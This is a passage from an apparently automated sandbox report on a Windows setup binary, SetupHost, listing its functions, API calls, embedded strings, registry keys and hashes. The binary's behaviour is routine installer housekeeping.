                                                                                                                        • Instruction ID: 0886721ac7a49e75e7e6cc0e36dfbeb74c0e21ce1fc5afce08a1d3e270442350
                                                                                                                        • Opcode Fuzzy Hash: 111176b624cad8123a660f3cd5ab0c0cfe4106deaff22d8e57089fc2347a2523
                                                                                                                        • Instruction Fuzzy Hash: 3A314B71D00229FBCB21CF98D948AEEBFB9FF18719F104066E811A7250DB709E49DB94
                                                                                                                        Function 004ECC13 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 153COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004ECC1A
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004ECDCC
                                                                                                                          • Part of subcall function 004F7D4B: UuidToStringW.RPCRT4(00000000,00000001), ref: 004F7D71
                                                                                                                          • Part of subcall function 004F7D4B: RpcStringFreeW.RPCRT4(00000000), ref: 004F7DD1
                                                                                                                          • Part of subcall function 004F8A19: __EH_prolog3.LIBCMT ref: 004F8A20
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeH_prolog3String$LibraryUuid
                                                                                                                        • String ID: CSetupHost::LoadSetupObject$SetupHost: Loading ID: [%s] from [%s\%s]...$SetupHost: Loading complete.$W
                                                                                                                        • API String ID: 4275956829-1340171671
                                                                                                                        • Opcode ID: c96b0d018180dcfcff0ed19ae8e3fa22b204d118c5452a3539efbacb90b196c4
                                                                                                                        • Instruction ID: a733b0873824342f34c613e236651ea0c15e011343090afd6b07258e415a9850
                                                                                                                        • Opcode Fuzzy Hash: c96b0d018180dcfcff0ed19ae8e3fa22b204d118c5452a3539efbacb90b196c4
                                                                                                                        • Instruction Fuzzy Hash: 6751B574B002199BCF04AF65CCA9E7EB772AF88311F14442FE9059B391CB789C02CB95
                                                                                                                        Function 00549C98 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 134registrytimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FE595: _vsnwprintf.MSVCRT ref: 004FE5C7
                                                                                                                        • RegGetValueW.KERNEL32(80000002,?,RefreshAfter,00000048,00000000,?,00000008,?,?,?,00000001,00000001,00000000), ref: 00549D41
                                                                                                                        • RegGetValueW.ADVAPI32(80000002,?,RefreshInterval,00000018,00000000,0000000D,00000004,?,?,?,00000001,00000001,00000000), ref: 00549D6B
                                                                                                                          • Part of subcall function 00549E64: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,00000000,?,?,?,?,80000002,00000001,00000000), ref: 00549EE2
                                                                                                                          • Part of subcall function 00549E64: RegCloseKey.ADVAPI32(00000000,?,?,?,?,80000002,00000001,00000000), ref: 0054A1CC
                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,00000001,00000001,00000000), ref: 00549D96
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: TimeValue$CloseFileOpenSystem_vsnwprintf
                                                                                                                        • String ID: %ls\%ls\%ls$RefreshAfter$RefreshInterval
                                                                                                                        • API String ID: 2199227765-3481348938
                                                                                                                        • Opcode ID: bd65773cee730135a4c1bfcd4741a1bc9753d7a857f6e3bfef5e510962068f62
                                                                                                                        • Instruction ID: e50905855e1982a74bf221ba93458aebe9e8bcdee53f763108836e60176480e1
                                                                                                                        • Opcode Fuzzy Hash: bd65773cee730135a4c1bfcd4741a1bc9753d7a857f6e3bfef5e510962068f62
                                                                                                                        • Instruction Fuzzy Hash: 6F5162B1A8021C9BDB24DF64DC99BDABBFDBB58704F0044AAE509D3241E774AE84CF54
                                                                                                                        Function 0053E4A7 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 0053E4D9
                                                                                                                        • RtlGetVersion.NTDLL ref: 0053E4EE
                                                                                                                          • Part of subcall function 004F9CA1: GetModuleHandleExW.KERNEL32(00000001,ntdll.dll,?,?,?,?,00000000,?,004E7B5C), ref: 004F9CD7
                                                                                                                          • Part of subcall function 004F9CA1: GetLastError.KERNEL32(?,?,?,00000000,?,004E7B5C), ref: 004F9CE1
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 0053E537
                                                                                                                        Strings
                                                                                                                        • base\ntsetup\conx\common\setuplib\src\osinfo.cpp, xrefs: 0053E54E
                                                                                                                        • ConX::Setup::Common::COSInfoHelper::GetHostOSVersion, xrefs: 0053E549
                                                                                                                        • Host OS version: %u.%u.%u.%u %s (%hu.%hu) Platform 0x%X, SuiteMask 0x%hX, ProdType 0x%hX, xrefs: 0053E590
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$HandleModuleVersionmemset
                                                                                                                        • String ID: ConX::Setup::Common::COSInfoHelper::GetHostOSVersion$Host OS version: %u.%u.%u.%u %s (%hu.%hu) Platform 0x%X, SuiteMask 0x%hX, ProdType 0x%hX$base\ntsetup\conx\common\setuplib\src\osinfo.cpp
                                                                                                                        • API String ID: 872402777-2280374826
                                                                                                                        • Opcode ID: bc0fa837dc3916ac502eb12dd7ba7462c49309d2ec5fcc68defaf31b1304e311
                                                                                                                        • Instruction ID: f33ef0a7543915cd05183c7010d9e1bd4509e944c9f7f8739bf087db93fcae77
                                                                                                                        • Opcode Fuzzy Hash: bc0fa837dc3916ac502eb12dd7ba7462c49309d2ec5fcc68defaf31b1304e311
                                                                                                                        • Instruction Fuzzy Hash: B9313EB1508355ABC7209F65D815AAFBBE8FF88705F00091EF99896280E774DD14CBA2
                                                                                                                        Function 0054A332 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85registrytimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,00000001,?), ref: 0054A36D
                                                                                                                          • Part of subcall function 004FE595: _vsnwprintf.MSVCRT ref: 004FE5C7
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,?,00000000,000F003F,?), ref: 0054A3EF
                                                                                                                        • RegSetValueExW.KERNEL32(?,RefreshAfter,00000000,0000000B,?,00000008), ref: 0054A41F
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0054A43B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$CloseFileOpenSystemValue_vsnwprintf
                                                                                                                        • String ID: %ls\%ls\%ls$RefreshAfter
                                                                                                                        • API String ID: 3920268704-4261152845
                                                                                                                        • Opcode ID: 2259bd20d47af6da088c14ba9585cd4350ce97d0d059550977c694712a2d6e41
                                                                                                                        • Instruction ID: 0f871ae90b9a8568fcd237a79894f71fa917cfb9cb6b809b2d78782fd5c4e861
                                                                                                                        • Opcode Fuzzy Hash: 2259bd20d47af6da088c14ba9585cd4350ce97d0d059550977c694712a2d6e41
                                                                                                                        • Instruction Fuzzy Hash: 69318B72D8122DABCB20DF54DC89ADAFBB8FB58311F0001EAA909E3250D6709E448FD1
                                                                                                                        Function 004FD14E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,00000000), ref: 004FD18D
                                                                                                                        • IsWow64Process.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 004FD194
                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000000,?,00000000), ref: 004FD19E
                                                                                                                        • RegCreateKeyExW.KERNEL32(80000002,SYSTEM\Setup\MoSetup,00000000,00000000,00000000,00020019,00000000,00000000,?,?,?,00000000), ref: 004FD1D5
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,00000000), ref: 004FD210
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseCreateCurrentErrorLastWow64
                                                                                                                        • String ID: SYSTEM\Setup\MoSetup
                                                                                                                        • API String ID: 2503966421-2337335475
                                                                                                                        • Opcode ID: 1658f679fb4b2bf5a61a2b5996924eb09696057b6ff5ee741a0670e63302fd09
                                                                                                                        • Instruction ID: a99595bb3b8aa4885333f51bad4882f124f591800d16b2a7ea034e825b550c1f
                                                                                                                        • Opcode Fuzzy Hash: 1658f679fb4b2bf5a61a2b5996924eb09696057b6ff5ee741a0670e63302fd09
                                                                                                                        • Instruction Fuzzy Hash: FE217C31E0021DEBDF14DFA5D908AAFBBB9AF48355F10006AAA05E3250D7389E04DBA5
                                                                                                                        Function 004FD21F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,SYSTEM\Setup\MoSetup\Volatile,?,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FD25E
                                                                                                                        • IsWow64Process.KERNEL32(00000000,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FD265
                                                                                                                        • GetLastError.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FD26F
                                                                                                                        • RegCreateKeyExW.KERNEL32(80000002,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,00000000,00020019,00000000,?,?,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000), ref: 004FD2A6
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000), ref: 004FD2E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseCreateCurrentErrorLastWow64
                                                                                                                        • String ID: SYSTEM\Setup\MoSetup\Volatile
                                                                                                                        • API String ID: 2503966421-1711884389
                                                                                                                        • Opcode ID: ae70278196de93a2e25adb8be035002150b6fcca8ad3e73c10aab010fdb541d1
                                                                                                                        • Instruction ID: 60cc42dfdc16ac965ff399ecc501c8cc55ad6855da2db8c2c87beb18231814b2
                                                                                                                        • Opcode Fuzzy Hash: ae70278196de93a2e25adb8be035002150b6fcca8ad3e73c10aab010fdb541d1
                                                                                                                        • Instruction Fuzzy Hash: 8E217F35E0021DEBDF149FA5D809AAFBBB9AF48355F1100AAAA05E3250D7389E04DBD5
                                                                                                                        Function 004FAF4E Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • CMoSetupOneSettingsHelperT<class CEmptyType>::SetServerEndpoint, xrefs: 004FAF76, 004FAFA1
                                                                                                                        • SYSTEM\Setup\MoSetup, xrefs: 004FAFB4
                                                                                                                        • settings-win-ppe.data.microsoft.com, xrefs: 004FAFE0
                                                                                                                        • TestMode, xrefs: 004FAFBA
                                                                                                                        • settings-win.data.microsoft.com, xrefs: 004FAF87
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID: CMoSetupOneSettingsHelperT<class CEmptyType>::SetServerEndpoint$SYSTEM\Setup\MoSetup$TestMode$settings-win-ppe.data.microsoft.com$settings-win.data.microsoft.com
                                                                                                                        • API String ID: 431132790-2510570186
                                                                                                                        • Opcode ID: 4af013b143e1357ec3831b528bbf8682025681e37a9a54a8b2111ffa0ce2984f
                                                                                                                        • Instruction ID: d9f4292dc4f4cb2abb14a36f35fec1aa7f5387c70f6b26712ced18113bc69e68
                                                                                                                        • Opcode Fuzzy Hash: 4af013b143e1357ec3831b528bbf8682025681e37a9a54a8b2111ffa0ce2984f
                                                                                                                        • Instruction Fuzzy Hash: 6A1160B9B0021A97CB15DB548851B7E7272ABC4704F10441FEA15AF381DF7C9D5187AA
                                                                                                                        Function 004FD0B5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FD0D0
                                                                                                                        • IsWow64Process.KERNEL32(00000000,?,00000000), ref: 004FD0D7
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 004FD0E1
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,SYSTEM\Setup\MoSetup\Volatile,00000000,?,?,?,00000000), ref: 004FD10E
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004FD13F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseCurrentErrorLastOpenWow64
                                                                                                                        • String ID: SYSTEM\Setup\MoSetup\Volatile
                                                                                                                        • API String ID: 3444879603-1711884389
                                                                                                                        • Opcode ID: 77bbd2248471a16d17aca5d5a8dddcafd9bf71bef971c39d6c2abd4bec10c3b0
                                                                                                                        • Instruction ID: b83943b0f83f91facdd3f9181cd8fd7854efabc2d44e928f926a90edc7173f4b
                                                                                                                        • Opcode Fuzzy Hash: 77bbd2248471a16d17aca5d5a8dddcafd9bf71bef971c39d6c2abd4bec10c3b0
                                                                                                                        • Instruction Fuzzy Hash: 5B115E31E0020CEFCF14AFA5E9989AEBBB9EF48355B10406AE505D3250DB788E05EB64
                                                                                                                        Function 004FF496 Relevance: 10.6, APIs: 7, Instructions: 57memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileVersionInfoSizeExW.KERNELBASE(00000003,?,00000000,?,00000000,?,00000000), ref: 004FF4B0
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00000000), ref: 004FF4C1
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 004FF4C8
                                                                                                                        • GetFileVersionInfoExW.KERNELBASE(00000003,?,00000000,?,00000000,?,00000000), ref: 004FF4E0
                                                                                                                        • SetLastError.KERNEL32(00000008,?,00000000), ref: 004FF4F9
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 004FF506
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 004FF50D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FileInfoProcessVersion$AllocErrorFreeLastSize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 91032023-0
                                                                                                                        • Opcode ID: 0e3345d6c223214d63c2216166431e3569b358e96428234c2cd9bed8d6d0e229
                                                                                                                        • Instruction ID: a26779af8531dc1851ad539d9a547d848f845efd358acb053e8c5832a060e8d5
                                                                                                                        • Opcode Fuzzy Hash: 0e3345d6c223214d63c2216166431e3569b358e96428234c2cd9bed8d6d0e229
                                                                                                                        • Instruction Fuzzy Hash: 4E019636A04319BBDB111FA9AC5CB7F7F6CEF58712F044065BA09D22D0DA748A089BA0
                                                                                                                        Function 004FE347 Relevance: 10.5, APIs: 7, Instructions: 48memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(00000057,00000000,004FF550,?,00000000), ref: 004FE3B4
                                                                                                                          • Part of subcall function 004FE5FC: GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004FE360,?,00000000,00000000,004FF550), ref: 004FE660
                                                                                                                          • Part of subcall function 004FE5FC: GetLastError.KERNEL32(?,?,?,004FE360,?,00000000,00000000,004FF550), ref: 004FE676
                                                                                                                          • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6C3
                                                                                                                          • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6DB
                                                                                                                        • GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,004FF550,?,00000000), ref: 004FE367
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 004FE383
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 004FE38E
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 004FE395
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,004FF550,?,00000000), ref: 004FE39D
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 004FE3A6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Heap_wcsnicmp$AttributesFileFreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 686246089-0
                                                                                                                        • Opcode ID: 9589da0c591775712c5c3696b0be8b92a6ca9f3cf95e7b6ddfc8852295fc5f08
                                                                                                                        • Instruction ID: 2f71d5f44d2d50eb0e79ce77be2d99e6de9b0a4acd504c446fe312536f7d736a
                                                                                                                        • Opcode Fuzzy Hash: 9589da0c591775712c5c3696b0be8b92a6ca9f3cf95e7b6ddfc8852295fc5f08
                                                                                                                        • Instruction Fuzzy Hash: 52F02D3B5087289BD31017BA7C1C57B2A25EBD8733B1A0666FE12C32B0D7244C0AB595
                                                                                                                        Function 004FB1D4 Relevance: 9.1, APIs: 6, Instructions: 87memoryregistryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FD0D0
                                                                                                                          • Part of subcall function 004FD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 004FD0D7
                                                                                                                          • Part of subcall function 004FD0B5: GetLastError.KERNEL32(?,00000000), ref: 004FD0E1
                                                                                                                          • Part of subcall function 004FD0B5: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004FD13F
                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000001,00000000,00000000,00000000), ref: 004FB216
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004FB237
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004FB23E
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 004FB29E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 004FB2A5
                                                                                                                        • RegCloseKey.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 004FB2B4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess$Close$AllocCurrentErrorFreeLastQueryValueWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 700423131-0
                                                                                                                        • Opcode ID: 4db1ab5e0b79688da5f7a16f34c1bf1a4b3baf3f23e76d43605528f1973d411d
                                                                                                                        • Instruction ID: 68beabf6a4eff96f3da005615dadfd63136dfaa35a44ccef63aff1a423b4ea14
                                                                                                                        • Opcode Fuzzy Hash: 4db1ab5e0b79688da5f7a16f34c1bf1a4b3baf3f23e76d43605528f1973d411d
                                                                                                                        • Instruction Fuzzy Hash: 23217531A0031DEBDB119BE1D89CBBFB779EF09305F1141ABAA0196251CB788E049BD5
                                                                                                                        Function 004FB3EE Relevance: 9.1, APIs: 6, Instructions: 87memoryregistryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FD0D0
                                                                                                                          • Part of subcall function 004FD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 004FD0D7
                                                                                                                          • Part of subcall function 004FD0B5: GetLastError.KERNEL32(?,00000000), ref: 004FD0E1
                                                                                                                          • Part of subcall function 004FD0B5: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004FD13F
                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,00000000,00000001,00000001,00000000,00000000,?,?,?,00000000), ref: 004FB430
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000001,?,00000000), ref: 004FB451
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 004FB458
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000001,00000000,00000000,?,?,?,00000000), ref: 004FB4B8
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 004FB4BF
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,?,?,?,00000000), ref: 004FB4CE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
